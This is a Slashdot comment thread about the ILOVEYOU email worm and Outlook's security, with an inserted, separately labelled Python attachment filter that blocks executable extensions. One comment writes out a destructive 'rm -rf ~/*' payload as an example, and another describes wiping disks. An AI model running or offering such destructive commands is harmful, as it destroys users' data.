  56. Re:Someone please explain.. by Detritus · · Score: 2
    What worries me, and I like to have this explained, is why people continue to use Outlook.

    That's simple. They work for one of the many corporations whose CIO has been assimilated by Microsoft, resulting in the mandatory use of Microsoft Windows, Office and Exchange. If you use Exchange for a mail server, you need Outlook on the client machines. My company recently "upgraded" from MS Mail to Exchange. The LAN Admins installed Outlook on every user's PC. I asked them why they didn't install some UNIX POP3 servers and save a ton of money. They said the deployment of Exchange was corporate policy, at the highest level.

    --
    Mea navis aericumbens anguillis abundat
  57. E-mail smarter than people? by MadAhab · · Score: 2
    The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
    I'm sure this is true, but the fact that Windows makes so many decisions "for" its users, and that so many of those decisions are plain wrong, is really why this happens.

    Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't a bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.

    Vive la difference or die.

    Boss of nothin. Big deal.
    Son, go get daddy's hard plastic eyes.

    --
    Expanding a vast wasteland since 1996.
  58. Stacking dynamite by Jeremi · · Score: 5
    The annoying bit is now the FBI is going to make it their #1 priority to track down the author of this script and charge him with "millions of dollars in damages".


    That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propagate.


    It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...


    Jeremy, your friendly Slashdot anti-M$ zealot

    --


    I don't care if it's 90,000 hectares. That lake was not my doing.
  59. Now THIS is funny - it was faxed to me by brennan73 · · Score: 5
    So this morning, I get a fax at work. It's directed at the old network admin, and is like six pages of junk, Windows registry settings and such. I put it aside, with the intention of calling the person later to tell them that he doesn't work here anymore and ask what in the world she sent me.

    Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs". Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)

    -brennan

  60. Verdict Announced! by Enzaro · · Score: 2

    I found this news article only just a few minutes ago...
    WASHINGTON:

    U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regarding the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.

    Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizarre email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."

    The breakup is to proceed immediately.

  61. Re:Unix won. by Sun+Tzu · · Score: 2

    Here in my data center, I still sometimes hear the refrain from the mainframers; "but Unix can't handle the I/O!".

    Little do they know that the EMC disk arrays that handle the mainframe storage are all Unix boxes themselves. ;)

  62. FAX machines vulnerable! by jabber · · Score: 2

    Caution and warning.

    This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.

    It doesn't just eat bandwidth, it eats paper and phone connections too.

    --

    -- What you do today will cost you a day of your life.
  63. Re:Too many email users are ignorant as piss. by lee · · Score: 2

    I sent out an email telling users of this virus and warning outlook is to be uninstalled on all systems. We use something else for email.

    So what do the id10ts do? They double click on an outlook icon and in some cases reinstall it to see what all the fuss is about!

    --
    --- If you don't want to know the answer, don't ask the question.
  64. NAV Exchange signatures by bort13 · · Score: 2

    For any of you protecting your Exchange 5.5 server with Norton Antivirus (Symantec), there are signatures here. They aren't tested or approved, AFAIK, but they're working at my location. It won't repair the file but will quarantine bad attachments. You might want to keep the server off your network while you do this. Stop your store while you're copying the signature file to your server, then pull your ethernet cable when you want to start it again to run NAV.

    That url is ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/specdef

  65. Re:Here is the Visual Basic Script that is "ILOVEY by derrickh · · Score: 2

    At least it's open source.

  66. MP3s... by Spasemunki · · Score: 3

    Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .

  67. MS friendly news by gad_zuki! · · Score: 5

    I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?

    What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'

  68. Re:Remember to blame Microsoft! by Zagato-sama · · Score: 2

    The findings of fact have nothing to do with this. Microsoft certainly has better things to do than create trojans and virii for its users. This black helicopter mentality is simply foolish.

  69. fwd: Joke (variant) by Wanker · · Score: 2

    A new variant is already making the rounds. Does anyone know the best way to configure sendmail to reject ALL Visual Basic attachments?

    The new variant uses a subject of "fwd: Joke"
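
Added example, not part of the thread: subject-line filters like the ones posted above stop matching once a variant changes its subject (as with "fwd: Joke"), so this Python check keys on the attachment's final file extension instead. The extension lists, function names and sample messages are assumptions constructed for illustration.

```python
from email import message_from_bytes
from email.message import EmailMessage

# Assumed blocklist (not exhaustive): types Windows runs on double-click.
BLOCKED_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "shs", "hta",
                "scr", "pif", "bat", "cmd", "com", "exe", "lnk"}
# Harmless-looking inner extensions used to disguise the real one.
DECOY_EXTS = {"txt", "doc", "jpg", "gif", "pdf", "mp3"}

def split_extensions(filename):
    """Return (inner_ext, final_ext), lowercased, as Windows would see them."""
    # Drop any path, then the trailing dots/spaces that Win32 strips on save.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ")
    parts = name.lower().split(".")
    final = parts[-1] if len(parts) > 1 else ""
    inner = parts[-2] if len(parts) > 2 else ""
    return inner, final

def risky_attachments(raw_message):
    """List (filename, reason) for every MIME part that should be quarantined."""
    findings = []
    for part in message_from_bytes(raw_message).walk():
        # Content-Disposition filename=, falling back to Content-Type name=.
        filename = part.get_filename()
        if not filename:
            continue
        inner, final = split_extensions(filename)
        if final in BLOCKED_EXTS:
            reason = "blocked extension ." + final
            if inner in DECOY_EXTS:
                reason += ", disguised as ." + inner
            findings.append((filename, reason))
    return findings

def build_sample(subject, filename):
    """Constructed test message; the attachment body is a harmless placeholder."""
    msg = EmailMessage()
    msg["Subject"] = subject
    msg.set_content("see attachment")
    msg.add_attachment(b"placeholder\n", maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()

if __name__ == "__main__":
    samples = [("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
               ("fwd: Joke", "joke.VBS"),        # constructed attachment name
               ("Quarterly numbers", "report.txt")]
    for subject, name in samples:
        print(subject, "->", risky_attachments(build_sample(subject, name)))
```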

  70. What about the CELL PHONES? by cperciva · · Score: 2

    Many PCS cell phones now have email to text message gateways, and I'm sure that some PCS phones' email addresses are in some peoples' lists...

    Are we going to be hearing about PCS systems crashing under heavy load of I-LOVE-YOU text messages?

  71. It propagated through Pine. by not_again · · Score: 2
    I just heard a co-worker say his computer was infected while running pine on a unix box.

    How?!

    The user saved the attachment on the unix server, ftp'd it to his windows box and ran it!

  72. Re:Remember to blame Microsoft! by Zagato-sama · · Score: 2

    Could you possibly be more vague? What is it that microsoft has to do? Work on the best office suite? Best Web browser? Most popular operating system? Perhaps they should be focusing more on the X-box? Or Whistler?

    Or should they be spearheading breakthrough innovations like bundling software made by someone else, and slapping a Redhat logo on it?

  73. Copyright infringement by Scrag · · Score: 2

    I'm sure the author of this program is going to be extremely upset when he finds out about all the people illegally distributing his copyrighted work!

    Maybe he can hire NetPD to find out who the people distributing his vb script are.

    I hope this gets stopped before it sets more of a precedent for people to just ignore copyright laws.

  74. Not Just Outlook by sparkz · · Score: 2
    Windows doesn't have /usr/share/magic; associations are purely based on the final .xxx of the filename. (AFAIK)

    But what damage could a .sh do in, say, Pine?
    Well, not a lot; the script would be shown; you have the option of viewing it and then, if you like, save and run....

    But the fact is, any high-exposure software (mail-client, Napster, whatever) is vulnerable, not just because it runs under a single-user OS, but because it's a prime target; who'd bother exploiting a weakness in kmail / elm / pine / etc?

    This isn't of course forgetting (OSS)sendmail's many security holes... it also is high-exposure, and often runs as root(0)... Why bother with file permissions when you've got an exploit letting you become God?

    Okay, it's easy when a Windows user is root by default.

    What I'm saying is:

    It's not just M$ / closed software which is vulnerable to this kind of exploit; anything in wide use is the main target.

    This means that OSS is far from invincible to this kind of attack - especially as it gets more popular - sendmail is an old and tried example of this. Worth bearing in mind before we slam Closed / M$ software for being so buggy

    This doesn't excuse M$ for allowing Outlook to run these scripts any more than it excuses sendmail authors from their responsibility.

    Yrs, Steve.

    --
    Author, Shell Scripting : Expert Re
  75. Quote from Microsoft by wowbagger · · Score: 5
    This is a real quote from Scott Culp, program manager for Microsoft's security response center:
    "In this case the virus author chose to target Outlook probably because it gave him better reach. There isn't a security vulnerability in Outlook involved in this at all."

    I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.


    I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.

  76. It's not enough to say that MS is vulnerable. by Ungrounded+Lightning · · Score: 2

    If you want to get people to change their behavior you have to do more than tell them to stop the "bad" behavior. You have to give them a "good" alternative.

    Instead of saying "I told you Microsoft was bad." we should be saying "Switch to Linux so you won't be vulnerable to this class of attack."

    (Sure there are attacks that are possible on Linux. But they're fewer, and a damned sight harder to pull off. Microsoftware, on the other hand, has gaping holes all over the place, and no way for anybody who doesn't work for Bill's company, or hand-in-glove with it, to fix them.)

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  77. Re:Uh, What? by / · · Score: 2

    Think about how what you're suggesting isn't what I'm suggesting. Each program ought to be given its own space to poop in, but there's no reason for them to poop globally on the system as a whole. Any of that ought to be determined upon installing the software initially, which is presumably done by an intelligent and informed user or superuser.

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  78. Of VBS attachments in Outlook Express... by PenguiN42 · · Score: 2

    Alright, I wrote a small vbs file and emailed it to myself, to see if any of the FUD here is true.

    First of all, IT DOES *NOT* EXECUTE AUTOMATICALLY IN THE PREVIEW PANE!!! I don't know what you people are talking about! I have to click on the attachment-button, then click on "Excel.VBS" in the drop-down menu.

    It then pops up a dialog that says:

    "Open Attachment Warning

    Opening:
    EXCEL.VBS

    Some files can contain viruses or otherwise be harmful to your computer. It is important to be certain that this file is from a trustworthy source.

    What would you like to do with this file?
    [ ] Open it
    [x] Save it to disk

    [x] Always ask before opening this type of file"

    You have to choose "Open it" then click "OK", then it runs.

    That's a pretty stern warning, but people ignore it because it's from someone they know. You would think that people would learn after the Melissa worm. Don't run ANY files you receive in email without confirmation first.

    -------------
    The following sentence is true.

    --
    The following sentence is true. The preceding sentence was false.
  79. A simple solution for microsoft: by PenguiN42 · · Score: 2
    I was thinking about this, and there's a simple solution that would stop the spread and damage of 99% of these worms: Microsoft should implement three user confirmation checks in all their scripting and macros:

    1) "This script is attempting to send mail, would you like to allow it?"

    2) "This script is attempting to modify the hard disk, would you like to allow it?"

    3) "This script is attempting to modify your startup programs, would you like to allow it?"

    Pretty easy, ne? Maybe I should email them :P

    -------------
    The following sentence is true.

    --
    The following sentence is true. The preceding sentence was false.
  80. Re:Jeez what an ugly programming language! by RayChuang · · Score: 2

    Colin,

    Writing things like this in Visual Basic is easy.

    But one of these days, some really expert programmer with a nasty intent is going to write a virus that is extremely insidious and start literally shutting down hardware that works on the various layers of the OSI networking model. Given that routers ARE computers of sorts, let's see how long before someone could bring down much of the Internet by bringing down a major backbone provider such as UUNet. :-(

    --
    Raymond in Mountain View, CA
  81. Re:OPening e-mail attachments by Alex+Belits · · Score: 2

    The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.

    File with .pl extension and content-type "application/octet-stream" is never executed by any decent mailreader -- mailreader even will warn you that there is no viewer defined for this content-type. If someone had "application/x-perl" in .mailcap pointing to "/bin/perl %s" (mailreaders never write files with executable permissions), AND it was used in the mail header, then and only then it will run, however no sane person will do such a thing and no system comes with this kind of configuration.

    --
    Contrary to the popular belief, there indeed is no God.
  82. Time delayed fuse by Sloppy · · Score: 2

    ILOVEYOU spread across the whole world in just a few hours. What if something like this killed the host an hour or two after infection? By the time it destructed, it would already have several generations of offspring.


    ---
    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  83. Re:quick fix by otis+wildflower · · Score: 2

    I'd have just overwritten the boot block, fucked up the FATs, and written pseudorandom gibberish on their C: drive... But I'm cruel like that.

    Don't gloat too loudly ;)
    Your Working Boy,

  84. Love Bytes, Love Stings? by BaronCarlos · · Score: 3
    According to this UPI Article, Manila Police have identified the Author.
    Of course, this could mean an arrest in 24 hours.
    *Carlos: Exit Stage Right*

    "Geeks, Where would you be without them?"

    --
    *Carlos: Exit Stage Right*

    "Geeks, Where would you be without them?"
    "Got Linux?"

  85. Hey, that's what I use ... by P_Simm · · Score: 2
    Microsith already has released its Lookout product.

    Take a look at it here.

    You know what to do with the HELLO.

    --

    You know what to do with the HELLO.
    Help create an open-source world ...